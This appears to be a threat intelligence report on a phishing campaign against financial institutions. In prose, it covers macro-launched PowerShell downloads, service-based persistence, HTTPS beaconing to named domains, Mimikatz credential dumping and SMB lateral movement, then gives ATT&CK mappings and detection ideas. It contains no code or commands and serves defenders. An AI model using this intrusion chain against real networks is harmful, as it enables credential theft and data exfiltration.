Alex Morgan — Threat Intelligence Analyst
Key Takeaways
- A phishing campaign targeting financial institutions utilized a malware-as-a-service model to deploy advanced payloads.
- The actor leveraged Phishing tactics to achieve initial access, primarily via email attachments.
- Command and Control communications were established through a series of encrypted beacons to evade detection.
Executive Summary
Our investigation into a recent phishing campaign revealed sophisticated techniques employed by threat actors targeting financial institutions. This campaign used a malware-as-a-service framework to deliver payloads that facilitated extensive network infiltration. We observed initial access achieved through curated emails containing malicious attachments, which led to the execution of a dropper technique. Subsequent actions were characterized by a range of lateral movement strategies as the actors deployed various tools to maintain persistence and control over the victim’s environment.
Initial Access
The attack commenced with an email campaign that cleverly impersonated a legitimate financial service provider. The email included an attachment labeled as a transaction document — specifically named Invoice_2023.docx. Our analysis revealed that when executed, the document exploited macro capabilities in Microsoft Word to launch a PowerShell script. This script was instrumental in downloading the malicious payload from a remote server, showcasing a classic use of Phishing combined with Malware Delivery.
Execution & Persistence
Upon downloading, the malware implanted itself in the victim’s system under the path C:\Program Files\FinancialApp\svc.exe. This binary employed a dynamic technique to establish persistence, utilizing Windows Service Creation methods to ensure that the implant would execute on system startup. Our investigation revealed that the malware had the capability to invoke additional payloads based on incoming commands from the Actor’s Command and Control (C2) infrastructure.
Command and Control
The C2 communication pattern was particularly sophisticated, utilizing a series of domain-generated algorithms to regularly change endpoint URLs. We identified that the implant communicated over HTTPS, utilizing TLS to encrypt its traffic, which significantly complicated detection efforts. The beacons were observed reaching out to domains such as randomletters1234.com and secure-finance.xyz, engaging in regular check-ins every 5 minutes. This allowed the actor to deliver updates and additional commands while minimizing the risk of detection.
Lateral Movement & Discovery
Once inside the network, the actor employed a multi-faceted approach for lateral movement, implementing the Credential Dumping technique via Mimikatz, which extracted passwords from memory. We detected several attempts to access administrative shares using the harvested credentials, specifically through SMB, leveraging the net use command to connect to remote systems. This activity was targeted at servers hosting sensitive financial data, thus amplifying their foothold across the compromised network.
Impact & Objectives
The ultimate goal of this operation appeared to be data exfiltration, particularly the extraction of customer information and transaction records. During our investigation, we confirmed that the malware had the capability to capture screenshots and log keystrokes, indicative of a broader strategy to pilfer sensitive data from end-users. Additionally, we observed the actor testing various exfiltration methods as they tried to funnel data through encrypted channels, highlighting advanced planning and execution throughout the attack lifecycle.
MITRE ATT&CK Mapping
- T1566 – Phishing: Utilized deceptive emails with malicious attachments to gain initial access.
- T1059.001 – PowerShell: Employed PowerShell scripts to execute downloads and commands on the victim’s machine.
- T1071.001 – Application Layer Protocol: Web Protocols: Used HTTPS traffic for Command and Control communications to encrypt data transmissions.
- T1021.001 – Remote Services: SMB/Windows Admin Shares: Executed lateral movement strategies using stolen credentials across shared resources.
Detection Opportunities
- Implement email filtering solutions to detect and block phishing emails based on known patterns.
- Monitor for suspicious PowerShell commands, particularly those attempting to download executables from untrusted sources.
- Utilize network monitoring tools to identify anomalous SMB traffic or unusual connection attempts to administrative shares.
Analyst Notes
This campaign highlights the continuing evolution of threat actors in utilizing sophisticated techniques combined with commodity tools for executing their operations. The reliance on an established malware-as-a-service model permits adversaries to lower the barrier to entry into cyberattacks, making such tactics increasingly prevalent across various sectors. Continuous monitoring, user education on phishing attempts, and robust response strategies are essential for mitigating the impact of similar threats.
Source: Original Report